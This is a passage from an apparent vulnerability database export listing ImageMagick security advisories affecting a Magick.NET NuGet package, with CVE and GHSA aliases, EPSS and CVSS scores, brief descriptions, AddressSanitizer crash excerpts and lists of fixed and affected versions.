vulnerability VCID-n47w-r932-abey
10
vulnerability VCID-r3vw-ncns-cqgb
11
vulnerability VCID-rbdg-vz8x-ykah
12
vulnerability VCID-rj9n-ra1t-77dy
13
vulnerability VCID-rjkf-pdny-2fhn
14
vulnerability VCID-sw7g-hxxr-n3e1
15
vulnerability VCID-x8c6-9pse-xkc8
16
vulnerability VCID-y58b-be93-hbfd
17
vulnerability VCID-zpcy-nms7-kuha
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
aliases GHSA-wfx3-6g53-9fgc
risk_score 1.6
exploitability 0.5
weighted_severity 3.3
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-6ztv-auh8-27gx
15
url VCID-acsa-1uwk-fqee
vulnerability_id VCID-acsa-1uwk-fqee
summary 
ImageMagick has Possible Heap Information Disclosure in PSD ZIP Decompression
### Description
A heap information disclosure vulnerability exists in ImageMagick's PSD (Adobe Photoshop) format handler. When processing a maliciously crafted PSD file containing ZIP-compressed layer data that decompresses to less than the expected size, uninitialized heap memory is leaked into the output image.

### Expected Impact
Information disclosure leading to potential exposure of sensitive data from server memory.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-24481
reference_id
reference_type
scores
0
value 0.00017
scoring_system epss
scoring_elements 0.03914
published_at 2026-04-04T12:55:00Z
1
value 0.00017
scoring_system epss
scoring_elements 0.03991
published_at 2026-04-21T12:55:00Z
2
value 0.00017
scoring_system epss
scoring_elements 0.0387
published_at 2026-04-18T12:55:00Z
3
value 0.00017
scoring_system epss
scoring_elements 0.0386
published_at 2026-04-16T12:55:00Z
4
value 0.00017
scoring_system epss
scoring_elements 0.03881
published_at 2026-04-13T12:55:00Z
5
value 0.00017
scoring_system epss
scoring_elements 0.03909
published_at 2026-04-12T12:55:00Z
6
value 0.00017
scoring_system epss
scoring_elements 0.03926
published_at 2026-04-11T12:55:00Z
7
value 0.00017
scoring_system epss
scoring_elements 0.03957
published_at 2026-04-09T12:55:00Z
8
value 0.00017
scoring_system epss
scoring_elements 0.03934
published_at 2026-04-08T12:55:00Z
9
value 0.00017
scoring_system epss
scoring_elements 0.03928
published_at 2026-04-07T12:55:00Z
10
value 0.00047
scoring_system epss
scoring_elements 0.14453
published_at 2026-04-02T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-24481
1
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-24481
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-24481
2
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
3
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
4
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
5
reference_url https://github.com/ImageMagick/ImageMagick/commit/51c9d33f4770cdcfa1a029199375d570af801c97
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick/commit/51c9d33f4770cdcfa1a029199375d570af801c97
6
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-96pc-27rx-pr36
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-26T14:39:38Z/
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-96pc-27rx-pr36
7
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-24481
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-24481
8
reference_url https://github.com/advisories/GHSA-96pc-27rx-pr36
reference_id GHSA-96pc-27rx-pr36
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-96pc-27rx-pr36
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1cpn-zvem-v7gt
1
vulnerability VCID-2zje-ag2v-7kac
2
vulnerability VCID-54da-fzyt-4ud2
3
vulnerability VCID-6h7x-3rue-kucp
4
vulnerability VCID-bw4q-dt1r-y3e4
5
vulnerability VCID-cuhw-ew1g-s3h2
6
vulnerability VCID-dabd-m3mf-3ker
7
vulnerability VCID-g41y-dv8u-3yf1
8
vulnerability VCID-jc5m-7rvc-2qg6
9
vulnerability VCID-n47w-r932-abey
10
vulnerability VCID-r3vw-ncns-cqgb
11
vulnerability VCID-rbdg-vz8x-ykah
12
vulnerability VCID-rj9n-ra1t-77dy
13
vulnerability VCID-rjkf-pdny-2fhn
14
vulnerability VCID-sw7g-hxxr-n3e1
15
vulnerability VCID-x8c6-9pse-xkc8
16
vulnerability VCID-y58b-be93-hbfd
17
vulnerability VCID-zpcy-nms7-kuha
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
aliases CVE-2026-24481, GHSA-96pc-27rx-pr36
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-acsa-1uwk-fqee
16
url VCID-anyp-2jr7-73a1
vulnerability_id VCID-anyp-2jr7-73a1
summary 
ImageMagick has a possible heap Use After Free vulnerability in its meta coder
A heap Use After Free vulnerability exists in the meta coder when an allocation fails and a single byte is written to a stale pointer.

```
==535852==ERROR: AddressSanitizer: heap-use-after-free on address 0x5210000088ff at pc 0x5581bacac14d bp 0x7ffdf667edf0 sp 0x7ffdf667ede0
WRITE of size 1 at 0x5210000088ff thread T0
```
references
0
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
1
reference_url https://github.com/ImageMagick/ImageMagick/commit/f5049954f12c6fcf090a776767526d2a4708d58b
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick/commit/f5049954f12c6fcf090a776767526d2a4708d58b
2
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-2gq3-ww97-wfjm
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value LOW
scoring_system cvssv3.1_qr
scoring_elements
2
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-2gq3-ww97-wfjm
3
reference_url https://github.com/advisories/GHSA-2gq3-ww97-wfjm
reference_id GHSA-2gq3-ww97-wfjm
reference_type
scores
0
value LOW
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-2gq3-ww97-wfjm
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1cpn-zvem-v7gt
1
vulnerability VCID-2zje-ag2v-7kac
2
vulnerability VCID-54da-fzyt-4ud2
3
vulnerability VCID-6h7x-3rue-kucp
4
vulnerability VCID-bw4q-dt1r-y3e4
5
vulnerability VCID-cuhw-ew1g-s3h2
6
vulnerability VCID-dabd-m3mf-3ker
7
vulnerability VCID-g41y-dv8u-3yf1
8
vulnerability VCID-jc5m-7rvc-2qg6
9
vulnerability VCID-n47w-r932-abey
10
vulnerability VCID-r3vw-ncns-cqgb
11
vulnerability VCID-rbdg-vz8x-ykah
12
vulnerability VCID-rj9n-ra1t-77dy
13
vulnerability VCID-rjkf-pdny-2fhn
14
vulnerability VCID-sw7g-hxxr-n3e1
15
vulnerability VCID-x8c6-9pse-xkc8
16
vulnerability VCID-y58b-be93-hbfd
17
vulnerability VCID-zpcy-nms7-kuha
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
aliases GHSA-2gq3-ww97-wfjm
risk_score 1.6
exploitability 0.5
weighted_severity 3.3
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-anyp-2jr7-73a1
17
url VCID-b43n-3d1g-u3fe
vulnerability_id VCID-b43n-3d1g-u3fe
summary 
ImageMagick's failure to limit MVG mutual causes Stack Overflow
Magick fails to check for circular references between two MVGs, leading to a stack overflow.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-68950.json
reference_id
reference_type
scores
0
value 4.0
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-68950.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-68950
reference_id
reference_type
scores
0
value 0.00024
scoring_system epss
scoring_elements 0.06625
published_at 2026-04-21T12:55:00Z
1
value 0.00024
scoring_system epss
scoring_elements 0.06475
published_at 2026-04-18T12:55:00Z
2
value 0.00024
scoring_system epss
scoring_elements 0.06467
published_at 2026-04-16T12:55:00Z
3
value 0.00024
scoring_system epss
scoring_elements 0.06532
published_at 2026-04-13T12:55:00Z
4
value 0.00024
scoring_system epss
scoring_elements 0.06541
published_at 2026-04-12T12:55:00Z
5
value 0.00024
scoring_system epss
scoring_elements 0.06548
published_at 2026-04-11T12:55:00Z
6
value 0.00024
scoring_system epss
scoring_elements 0.06462
published_at 2026-04-07T12:55:00Z
7
value 0.00024
scoring_system epss
scoring_elements 0.06438
published_at 2026-04-02T12:55:00Z
8
value 0.00024
scoring_system epss
scoring_elements 0.06512
published_at 2026-04-08T12:55:00Z
9
value 0.00024
scoring_system epss
scoring_elements 0.06474
published_at 2026-04-04T12:55:00Z
10
value 0.00024
scoring_system epss
scoring_elements 0.06553
published_at 2026-04-09T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-68950
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-68950
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-68950
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 4.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
5
reference_url https://github.com/ImageMagick/ImageMagick/commit/204718c2211903949dcfc0df8e65ed066b008dec
reference_id
reference_type
scores
0
value 4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value 4.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-30T18:09:01Z/
url https://github.com/ImageMagick/ImageMagick/commit/204718c2211903949dcfc0df8e65ed066b008dec
6
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2426284
reference_id 2426284
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2426284
7
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-68950
reference_id CVE-2025-68950
reference_type
scores
0
value 4.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-68950
8
reference_url https://github.com/advisories/GHSA-7rvh-xqp3-pr8j
reference_id GHSA-7rvh-xqp3-pr8j
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-7rvh-xqp3-pr8j
9
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-7rvh-xqp3-pr8j
reference_id GHSA-7rvh-xqp3-pr8j
reference_type
scores
0
value 4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value 4.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
2
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
3
value MODERATE
scoring_system generic_textual
scoring_elements
4
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-30T18:09:01Z/
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-7rvh-xqp3-pr8j
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.1
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-15ny-qqbj-qyfk
1
vulnerability VCID-1cpn-zvem-v7gt
2
vulnerability VCID-29r3-kvf4-n3hc
3
vulnerability VCID-2zje-ag2v-7kac
4
vulnerability VCID-54da-fzyt-4ud2
5
vulnerability VCID-569d-6nue-5kbq
6
vulnerability VCID-5uyd-bv33-h7g1
7
vulnerability VCID-5zkt-kcgx-a3e2
8
vulnerability VCID-62ar-kwbq-nyh3
9
vulnerability VCID-69f6-ceje-hyah
10
vulnerability VCID-6h7x-3rue-kucp
11
vulnerability VCID-6meg-yjby-a7gj
12
vulnerability VCID-6rma-wjdv-uqe9
13
vulnerability VCID-6ztv-auh8-27gx
14
vulnerability VCID-acsa-1uwk-fqee
15
vulnerability VCID-anyp-2jr7-73a1
16
vulnerability VCID-b5pd-kk97-gban
17
vulnerability VCID-bd1g-sfsp-37h7
18
vulnerability VCID-bw4q-dt1r-y3e4
19
vulnerability VCID-cbqr-aybx-d3e6
20
vulnerability VCID-cuhw-ew1g-s3h2
21
vulnerability VCID-d8yf-8rff-3yhf
22
vulnerability VCID-dabd-m3mf-3ker
23
vulnerability VCID-dtza-65ku-aber
24
vulnerability VCID-emmr-15qp-vfah
25
vulnerability VCID-f1zu-xb4j-8qhp
26
vulnerability VCID-fnck-7mvx-hqc9
27
vulnerability VCID-g41y-dv8u-3yf1
28
vulnerability VCID-gdg8-aejn-83c4
29
vulnerability VCID-h221-qd8d-tqa5
30
vulnerability VCID-jc5m-7rvc-2qg6
31
vulnerability VCID-jcjk-s89c-mbbm
32
vulnerability VCID-jvq6-xjbu-fkb9
33
vulnerability VCID-kdw5-8y5z-zya5
34
vulnerability VCID-kefv-kpkk-wudf
35
vulnerability VCID-mntx-6yku-3qcx
36
vulnerability VCID-n47w-r932-abey
37
vulnerability VCID-p5aw-n691-nkff
38
vulnerability VCID-pcme-bwan-3bcf
39
vulnerability VCID-r3vw-ncns-cqgb
40
vulnerability VCID-rbdg-vz8x-ykah
41
vulnerability VCID-rj9n-ra1t-77dy
42
vulnerability VCID-rjkf-pdny-2fhn
43
vulnerability VCID-sd54-b8z1-2fg7
44
vulnerability VCID-sd7w-6qv5-73ge
45
vulnerability VCID-sdc2-fcap-abaz
46
vulnerability VCID-sw7g-hxxr-n3e1
47
vulnerability VCID-tv15-dcnu-pbbn
48
vulnerability VCID-utfe-h3b7-jqcj
49
vulnerability VCID-uvpj-a8v5-ebgz
50
vulnerability VCID-vaks-d4k5-zue7
51
vulnerability VCID-vpdn-g1k9-1kdn
52
vulnerability VCID-x44m-x33k-hydn
53
vulnerability VCID-x8c6-9pse-xkc8
54
vulnerability VCID-xbsu-ac6g-53fn
55
vulnerability VCID-y4hn-6bv6-jugw
56
vulnerability VCID-y58b-be93-hbfd
57
vulnerability VCID-yx7r-r7ez-7uhp
58
vulnerability VCID-z9t9-bxf9-hkfk
59
vulnerability VCID-zab9-9tqj-hbhg
60
vulnerability VCID-zpcy-nms7-kuha
61
vulnerability VCID-zx14-t8et-ufcq
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.1
aliases CVE-2025-68950, GHSA-7rvh-xqp3-pr8j
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-b43n-3d1g-u3fe
18
url VCID-b5pd-kk97-gban
vulnerability_id VCID-b5pd-kk97-gban
summary 
ImageMagick: Converting multi-layer nested MVG to SVG can cause DoS
Magick fails to check for multi-layer nested mvg conversions to svg, leading to DoS.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-24484.json
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-24484.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-24484
reference_id
reference_type
scores
0
value 0.00018
scoring_system epss
scoring_elements 0.04614
published_at 2026-04-21T12:55:00Z
1
value 0.00018
scoring_system epss
scoring_elements 0.04468
published_at 2026-04-16T12:55:00Z
2
value 0.00018
scoring_system epss
scoring_elements 0.04498
published_at 2026-04-13T12:55:00Z
3
value 0.00018
scoring_system epss
scoring_elements 0.04515
published_at 2026-04-12T12:55:00Z
4
value 0.00018
scoring_system epss
scoring_elements 0.04541
published_at 2026-04-09T12:55:00Z
5
value 0.00018
scoring_system epss
scoring_elements 0.04524
published_at 2026-04-08T12:55:00Z
6
value 0.00018
scoring_system epss
scoring_elements 0.04489
published_at 2026-04-07T12:55:00Z
7
value 0.00018
scoring_system epss
scoring_elements 0.04477
published_at 2026-04-18T12:55:00Z
8
value 0.00018
scoring_system epss
scoring_elements 0.0453
published_at 2026-04-11T12:55:00Z
9
value 0.00056
scoring_system epss
scoring_elements 0.17539
published_at 2026-04-02T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-24484
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-24484
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-24484
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 5.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-26T14:41:00Z/
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
5
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
6
reference_url https://github.com/ImageMagick/ImageMagick/commit/0349df6d43d633bd61bb582d1e1e87d6332de32a
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-26T14:41:00Z/
url https://github.com/ImageMagick/ImageMagick/commit/0349df6d43d633bd61bb582d1e1e87d6332de32a
7
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-wg3g-gvx5-2pmv
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-26T14:41:00Z/
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-wg3g-gvx5-2pmv
8
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-24484
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-24484
9
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2442085
reference_id 2442085
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2442085
10
reference_url https://github.com/advisories/GHSA-wg3g-gvx5-2pmv
reference_id GHSA-wg3g-gvx5-2pmv
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-wg3g-gvx5-2pmv
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1cpn-zvem-v7gt
1
vulnerability VCID-2zje-ag2v-7kac
2
vulnerability VCID-54da-fzyt-4ud2
3
vulnerability VCID-6h7x-3rue-kucp
4
vulnerability VCID-bw4q-dt1r-y3e4
5
vulnerability VCID-cuhw-ew1g-s3h2
6
vulnerability VCID-dabd-m3mf-3ker
7
vulnerability VCID-g41y-dv8u-3yf1
8
vulnerability VCID-jc5m-7rvc-2qg6
9
vulnerability VCID-n47w-r932-abey
10
vulnerability VCID-r3vw-ncns-cqgb
11
vulnerability VCID-rbdg-vz8x-ykah
12
vulnerability VCID-rj9n-ra1t-77dy
13
vulnerability VCID-rjkf-pdny-2fhn
14
vulnerability VCID-sw7g-hxxr-n3e1
15
vulnerability VCID-x8c6-9pse-xkc8
16
vulnerability VCID-y58b-be93-hbfd
17
vulnerability VCID-zpcy-nms7-kuha
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
aliases CVE-2026-24484, GHSA-wg3g-gvx5-2pmv
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-b5pd-kk97-gban
19
url VCID-bd1g-sfsp-37h7
vulnerability_id VCID-bd1g-sfsp-37h7
summary 
ImageMagick: Stack buffer overflow in FTXT reader via oversized integer field
### Summary
A stack-based buffer overflow exists in the ImageMagick FTXT image reader. A crafted FTXT file can cause out-of-bounds writes on the stack, leading to a crash.

```
=================================================================
==3537074==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffee4850ef0 at pc 0x5607c408fb33 bp 0x7ffee484fe50 sp 0x7ffee484fe40
WRITE of size 1 at 0x7ffee4850ef0 thread T0
```
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25967.json
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25967.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-25967
reference_id
reference_type
scores
0
value 0.00018
scoring_system epss
scoring_elements 0.04879
published_at 2026-04-21T12:55:00Z
1
value 0.00057
scoring_system epss
scoring_elements 0.17825
published_at 2026-04-16T12:55:00Z
2
value 0.00057
scoring_system epss
scoring_elements 0.17882
published_at 2026-04-13T12:55:00Z
3
value 0.00057
scoring_system epss
scoring_elements 0.17931
published_at 2026-04-12T12:55:00Z
4
value 0.00057
scoring_system epss
scoring_elements 0.17976
published_at 2026-04-11T12:55:00Z
5
value 0.00057
scoring_system epss
scoring_elements 0.1796
published_at 2026-04-09T12:55:00Z
6
value 0.00057
scoring_system epss
scoring_elements 0.17899
published_at 2026-04-08T12:55:00Z
7
value 0.00057
scoring_system epss
scoring_elements 0.17811
published_at 2026-04-07T12:55:00Z
8
value 0.00057
scoring_system epss
scoring_elements 0.1811
published_at 2026-04-04T12:55:00Z
9
value 0.00057
scoring_system epss
scoring_elements 0.18055
published_at 2026-04-02T12:55:00Z
10
value 0.00057
scoring_system epss
scoring_elements 0.17835
published_at 2026-04-18T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-25967
2
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
3
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
4
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
5
reference_url https://github.com/ImageMagick/ImageMagick/commit/9afe96cc325da1e4349fbd7418675af2f8708c10
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick/commit/9afe96cc325da1e4349fbd7418675af2f8708c10
6
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-72hf-fj62-w6j4
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-72hf-fj62-w6j4
7
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-25967
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-25967
8
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2442126
reference_id 2442126
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2442126
9
reference_url https://github.com/advisories/GHSA-72hf-fj62-w6j4
reference_id GHSA-72hf-fj62-w6j4
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-72hf-fj62-w6j4
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
is_vulnerable true
